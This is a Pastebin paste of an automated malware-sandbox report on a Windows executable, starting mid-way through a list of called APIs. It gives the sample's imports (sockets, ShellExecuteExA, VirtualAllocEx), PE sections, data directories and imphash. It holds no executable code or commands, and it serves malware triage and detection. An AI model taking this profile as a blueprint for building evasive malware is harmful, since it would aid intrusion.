  1258.     "msvcrt.dll._strlwr",
  1259.     "msvcrt.dll.__getmainargs",
  1260.     "msvcrt.dll.__p__environ",
  1261.     "msvcrt.dll.__p__fmode",
  1262.     "msvcrt.dll.__set_app_type",
  1263.     "msvcrt.dll._cexit",
  1264.     "msvcrt.dll._iob",
  1265.     "msvcrt.dll._onexit",
  1266.     "msvcrt.dll._setmode",
  1267.     "msvcrt.dll.abort",
  1268.     "msvcrt.dll.atexit",
  1269.     "msvcrt.dll.atoi",
  1270.     "msvcrt.dll.exit",
  1271.     "msvcrt.dll.fclose",
  1272.     "msvcrt.dll.fflush",
  1273.     "msvcrt.dll.fopen",
  1274.     "msvcrt.dll.fprintf",
  1275.     "msvcrt.dll.fread",
  1276.     "msvcrt.dll.free",
  1277.     "msvcrt.dll.fwrite",
  1278.     "msvcrt.dll.malloc",
  1279.     "msvcrt.dll.memcpy",
  1280.     "msvcrt.dll.memmove",
  1281.     "msvcrt.dll.memset",
  1282.     "msvcrt.dll.signal",
  1283.     "msvcrt.dll.strcat",
  1284.     "msvcrt.dll.strcmp",
  1285.     "msvcrt.dll.strcpy",
  1286.     "msvcrt.dll.strlen",
  1287.     "msvcrt.dll.strncat",
  1288.     "shell32.dll.ShellExecuteExA",
  1289.     "user32.dll.GetSystemMetrics",
  1290.     "wsock32.dll.WSACleanup",
  1291.     "wsock32.dll.WSAStartup",
  1292.     "wsock32.dll.closesocket",
  1293.     "wsock32.dll.connect",
  1294.     "wsock32.dll.gethostbyname",
  1295.     "wsock32.dll.htons",
  1296.     "wsock32.dll.inet_addr",
  1297.     "wsock32.dll.inet_ntoa",
  1298.     "wsock32.dll.recv",
  1299.     "wsock32.dll.send",
  1300.     "wsock32.dll.socket",
  1301.     "shell32.dll.#680",
  1302.     "kernel32.dll.GetNativeSystemInfo",
  1303.     "kernel32.dll.SortGetHandle",
  1304.     "kernel32.dll.SortCloseHandle"
  1305. ]
  1306.  
  1307. [*] Static Analysis: {
  1308.     "pe": {
  1309.         "peid_signatures": null,
  1310.         "imports": [
  1311.             {
  1312.                 "imports": [
  1313.                     {
  1314.                         "name": "VirtualAllocEx",
  1315.                         "address": "0x41d00c"
  1316.                     },
  1317.                     {
  1318.                         "name": "GetCommandLineW",
  1319.                         "address": "0x41d010"
  1320.                     },
  1321.                     {
  1322.                         "name": "GetOEMCP",
  1323.                         "address": "0x41d014"
  1324.                     },
  1325.                     {
  1326.                         "name": "GetCommandLineA",
  1327.                         "address": "0x41d018"
  1328.                     },
  1329.                     {
  1330.                         "name": "GetProcAddress",
  1331.                         "address": "0x41d01c"
  1332.                     },
  1333.                     {
  1334.                         "name": "LoadLibraryA",
  1335.                         "address": "0x41d020"
  1336.                     },
  1337.                     {
  1338.                         "name": "GetLastError",
  1339.                         "address": "0x41d024"
  1340.                     },
  1341.                     {
  1342.                         "name": "GetModuleHandleA",
  1343.                         "address": "0x41d028"
  1344.                     },
  1345.                     {
  1346.                         "name": "GetCurrentProcess",
  1347.                         "address": "0x41d02c"
  1348.                     },
  1349.                     {
  1350.                         "name": "GetProcessHeap",
  1351.                         "address": "0x41d030"
  1352.                     },
  1353.                     {
  1354.                         "name": "InterlockedIncrement",
  1355.                         "address": "0x41d034"
  1356.                     },
  1357.                     {
  1358.                         "name": "lstrlenA",
  1359.                         "address": "0x41d038"
  1360.                     },
  1361.                     {
  1362.                         "name": "GetVersionExA",
  1363.                         "address": "0x41d03c"
  1364.                     },
  1365.                     {
  1366.                         "name": "GetVersionExW",
  1367.                         "address": "0x41d040"
  1368.                     },
  1369.                     {
  1370.                         "name": "InterlockedDecrement",
  1371.                         "address": "0x41d044"
  1372.                     },
  1373.                     {
  1374.                         "name": "GetCurrentThread",
  1375.                         "address": "0x41d048"
  1376.                     },
  1377.                     {
  1378.                         "name": "GetTickCount",
  1379.                         "address": "0x41d04c"
  1380.                     },
  1381.                     {
  1382.                         "name": "GetStartupInfoW",
  1383.                         "address": "0x41d050"
  1384.                     }
  1385.                 ],
  1386.                 "dll": "KERNEL32.dll"
  1387.             },
  1388.             {
  1389.                 "imports": [
  1390.                     {
  1391.                         "name": "DestroyWindow",
  1392.                         "address": "0x41d058"
  1393.                     },
  1394.                     {
  1395.                         "name": "RegisterClassW",
  1396.                         "address": "0x41d05c"
  1397.                     },
  1398.                     {
  1399.                         "name": "LoadIconA",
  1400.                         "address": "0x41d060"
  1401.                     },
  1402.                     {
  1403.                         "name": "SetWindowLongW",
  1404.                         "address": "0x41d064"
  1405.                     },
  1406.                     {
  1407.                         "name": "SetWindowTextW",
  1408.                         "address": "0x41d068"
  1409.                     },
  1410.                     {
  1411.                         "name": "DefWindowProcW",
  1412.                         "address": "0x41d06c"
  1413.                     },
  1414.                     {
  1415.                         "name": "CreateWindowExA",
  1416.                         "address": "0x41d070"
  1417.                     },
  1418.                     {
  1419.                         "name": "DestroyIcon",
  1420.                         "address": "0x41d074"
  1421.                     },
  1422.                     {
  1423.                         "name": "SendMessageW",
  1424.                         "address": "0x41d078"
  1425.                     },
  1426.                     {
  1427.                         "name": "CreateWindowExW",
  1428.                         "address": "0x41d07c"
  1429.                     },
  1430.                     {
  1431.                         "name": "UnregisterClassA",
  1432.                         "address": "0x41d080"
  1433.                     },
  1434.                     {
  1435.                         "name": "LoadStringW",
  1436.                         "address": "0x41d084"
  1437.                     },
  1438.                     {
  1439.                         "name": "PostMessageW",
  1440.                         "address": "0x41d088"
  1441.                     }
  1442.                 ],
  1443.                 "dll": "USER32.dll"
  1444.             },
  1445.             {
  1446.                 "imports": [
  1447.                     {
  1448.                         "name": "CreateDIBSection",
  1449.                         "address": "0x41d000"
  1450.                     },
  1451.                     {
  1452.                         "name": "CreateBitmap",
  1453.                         "address": "0x41d004"
  1454.                     }
  1455.                 ],
  1456.                 "dll": "GDI32.dll"
  1457.             },
  1458.             {
  1459.                 "imports": [
  1460.                     {
  1461.                         "name": "CoInitialize",
  1462.                         "address": "0x41d0d8"
  1463.                     },
  1464.                     {
  1465.                         "name": "CoGetObject",
  1466.                         "address": "0x41d0dc"
  1467.                     }
  1468.                 ],
  1469.                 "dll": "ole32.dll"
  1470.             },
  1471.             {
  1472.                 "imports": [
  1473.                     {
  1474.                         "name": "__setusermatherr",
  1475.                         "address": "0x41d090"
  1476.                     },
  1477.                     {
  1478.                         "name": "_c_exit",
  1479.                         "address": "0x41d094"
  1480.                     },
  1481.                     {
  1482.                         "name": "_except_handler3",
  1483.                         "address": "0x41d098"
  1484.                     },
  1485.                     {
  1486.                         "name": "_XcptFilter",
  1487.                         "address": "0x41d09c"
  1488.                     },
  1489.                     {
  1490.                         "name": "_cexit",
  1491.                         "address": "0x41d0a0"
  1492.                     },
  1493.                     {
  1494.                         "name": "exit",
  1495.                         "address": "0x41d0a4"
  1496.                     },
  1497.                     {
  1498.                         "name": "_wcmdln",
  1499.                         "address": "0x41d0a8"
  1500.                     },
  1501.                     {
  1502.                         "name": "__wgetmainargs",
  1503.                         "address": "0x41d0ac"
  1504.                     },
  1505.                     {
  1506.                         "name": "_initterm",
  1507.                         "address": "0x41d0b0"
  1508.                     },
  1509.                     {
  1510.                         "name": "_exit",
  1511.                         "address": "0x41d0b4"
  1512.                     },
  1513.                     {
  1514.                         "name": "_adjust_fdiv",
  1515.                         "address": "0x41d0b8"
  1516.                     },
  1517.                     {
  1518.                         "name": "__p__commode",
  1519.                         "address": "0x41d0bc"
  1520.                     },
  1521.                     {
  1522.                         "name": "__p__fmode",
  1523.                         "address": "0x41d0c0"
  1524.                     },
  1525.                     {
  1526.                         "name": "__set_app_type",
  1527.                         "address": "0x41d0c4"
  1528.                     },
  1529.                     {
  1530.                         "name": "_controlfp",
  1531.                         "address": "0x41d0c8"
  1532.                     },
  1533.                     {
  1534.                         "name": "__dllonexit",
  1535.                         "address": "0x41d0cc"
  1536.                     },
  1537.                     {
  1538.                         "name": "_onexit",
  1539.                         "address": "0x41d0d0"
  1540.                     }
  1541.                 ],
  1542.                 "dll": "msvcrt.dll"
  1543.             }
  1544.         ],
  1545.         "digital_signers": null,
  1546.         "exported_dll_name": null,
  1547.         "actual_checksum": "0x0001d0b3",
  1548.         "overlay": {
  1549.             "size": "0x00001f08",
  1550.             "offset": "0x0000c000"
  1551.         },
  1552.         "imagebase": "0x00400000",
  1553.         "reported_checksum": "0x0001d0b3",
  1554.         "icon_hash": null,
  1555.         "entrypoint": "0x00404636",
  1556.         "timestamp": "2016-08-19 14:55:52",
  1557.         "osversion": "4.0",
  1558.         "sections": [
  1559.             {
  1560.                 "name": ".text",
  1561.                 "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1562.                 "virtual_address": "0x00001000",
  1563.                 "size_of_data": "0x00004000",
  1564.                 "entropy": "5.74",
  1565.                 "raw_address": "0x00001000",
  1566.                 "virtual_size": "0x00003916",
  1567.                 "characteristics_raw": "0xf0000020"
  1568.             },
  1569.             {
  1570.                 "name": ".bss",
  1571.                 "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1572.                 "virtual_address": "0x00005000",
  1573.                 "size_of_data": "0x00000000",
  1574.                 "entropy": "0.00",
  1575.                 "raw_address": "0x00000000",
  1576.                 "virtual_size": "0x00017030",
  1577.                 "characteristics_raw": "0xc0000080"
  1578.             },
  1579.             {
  1580.                 "name": ".rdata",
  1581.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1582.                 "virtual_address": "0x0001d000",
  1583.                 "size_of_data": "0x00001000",
  1584.                 "entropy": "2.45",
  1585.                 "raw_address": "0x00005000",
  1586.                 "virtual_size": "0x000005dc",
  1587.                 "characteristics_raw": "0x40000040"
  1588.             },
  1589.             {
  1590.                 "name": ".data",
  1591.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1592.                 "virtual_address": "0x0001e000",
  1593.                 "size_of_data": "0x00005000",
  1594.                 "entropy": "6.48",
  1595.                 "raw_address": "0x00006000",
  1596.                 "virtual_size": "0x00004ef4",
  1597.                 "characteristics_raw": "0xd0000040"
  1598.             },
  1599.             {
  1600.                 "name": ".reloc",
  1601.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1602.                 "virtual_address": "0x00023000",
  1603.                 "size_of_data": "0x00001000",
  1604.                 "entropy": "0.70",
  1605.                 "raw_address": "0x0000b000",
  1606.                 "virtual_size": "0x0000024e",
  1607.                 "characteristics_raw": "0x42000040"
  1608.             }
  1609.         ],
  1610.         "resources": [],
  1611.         "dirents": [
  1612.             {
  1613.                 "virtual_address": "0x00000000",
  1614.                 "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1615.                 "size": "0x00000000"
  1616.             },
  1617.             {
  1618.                 "virtual_address": "0x0001d104",
  1619.                 "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1620.                 "size": "0x00000078"
  1621.             },
  1622.             {
  1623.                 "virtual_address": "0x00000000",
  1624.                 "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1625.                 "size": "0x00000000"
  1626.             },
  1627.             {
  1628.                 "virtual_address": "0x00000000",
  1629.                 "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1630.                 "size": "0x00000000"
  1631.             },
  1632.             {
  1633.                 "virtual_address": "0x0000c000",
  1634.                 "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1635.                 "size": "0x00001f08"
  1636.             },
  1637.             {
  1638.                 "virtual_address": "0x00023000",
  1639.                 "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1640.                 "size": "0x0000011c"
  1641.             },
  1642.             {
  1643.                 "virtual_address": "0x00000000",
  1644.                 "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1645.                 "size": "0x00000000"
  1646.             },
  1647.             {
  1648.                 "virtual_address": "0x00000000",
  1649.                 "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1650.                 "size": "0x00000000"
  1651.             },
  1652.             {
  1653.                 "virtual_address": "0x00000000",
  1654.                 "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1655.                 "size": "0x00000000"
  1656.             },
  1657.             {
  1658.                 "virtual_address": "0x00000000",
  1659.                 "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1660.                 "size": "0x00000000"
  1661.             },
  1662.             {
  1663.                 "virtual_address": "0x00000000",
  1664.                 "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1665.                 "size": "0x00000000"
  1666.             },
  1667.             {
  1668.                 "virtual_address": "0x00000000",
  1669.                 "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1670.                 "size": "0x00000000"
  1671.             },
  1672.             {
  1673.                 "virtual_address": "0x0001d000",
  1674.                 "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1675.                 "size": "0x000000e4"
  1676.             },
  1677.             {
  1678.                 "virtual_address": "0x00000000",
  1679.                 "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1680.                 "size": "0x00000000"
  1681.             },
  1682.             {
  1683.                 "virtual_address": "0x00000000",
  1684.                 "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1685.                 "size": "0x00000000"
  1686.             },
  1687.             {
  1688.                 "virtual_address": "0x00000000",
  1689.                 "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1690.                 "size": "0x00000000"
  1691.             }
  1692.         ],
  1693.         "exports": [],
  1694.         "guest_signers": {},
  1695.         "imphash": "ed3432959df410bdf8d52780a8c0d1d3",
  1696.         "icon_fuzzy": null,
  1697.         "icon": null,
  1698.         "pdbpath": null,
  1699.         "imported_dll_count": 5,
  1700.         "versioninfo": []
  1701.     }
  1702. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top